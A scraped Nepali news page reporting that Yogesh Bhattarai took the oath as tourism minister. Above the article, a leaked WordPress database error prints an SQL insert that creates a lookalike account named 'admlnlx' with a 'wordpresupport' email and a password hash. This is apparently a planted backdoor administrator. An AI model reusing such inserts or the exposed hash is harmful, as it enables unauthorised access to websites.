WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$ByKvCKpPsXz5RbD8LN2akop/FONrSL1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 19:44:17', '', 'admlnlx', 'admlnlx')

नवनियुक्त पर्यटनमन्त्री भट्टराईले लिए सपथ – Gaule Khabar

नवनियुक्त पर्यटनमन्त्री भट्टराईले लिए सपथ

नवनियुक्त पर्यटनमन्त्री भट्टराईले लिए सपथ

गाउँले न्युज, १५ साउन, काठमाडौं । नवनियुक्त संस्कृति, पर्यटन तथा नागरिक उडययनमन्त्री योगेश भट्टराईले सपथ लिएका छन् ।
प्रधानमन्त्री केपी शर्मा ओलीले बुधबार दिउँसो सत्तारुढ नेकपाका स्थायी कमिटी सदस्य भट्टराईलाई पर्यटनमन्त्री नियुक्त गरेको हो । नव नियुक्त्त संस्कृति, पर्यटन तथा नागरिक उडययनमन्त्री योगेश भट्टराईले अपराहृन राष्ट्रपति विद्यादेवी भण्डारीसामू पद तथा गोपनियताको सपथ लिएका छन् ।
तत्कालीन पर्यटनमन्त्री रवीन्द्र अधिकारीको १५ फागुनमा हेलिकोप्टर दुर्घटनामा निधन भएपछि यो मन्त्रालय प्रधानमन्त्री ओली आफैंले सम्हाल्दै आएका थिए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका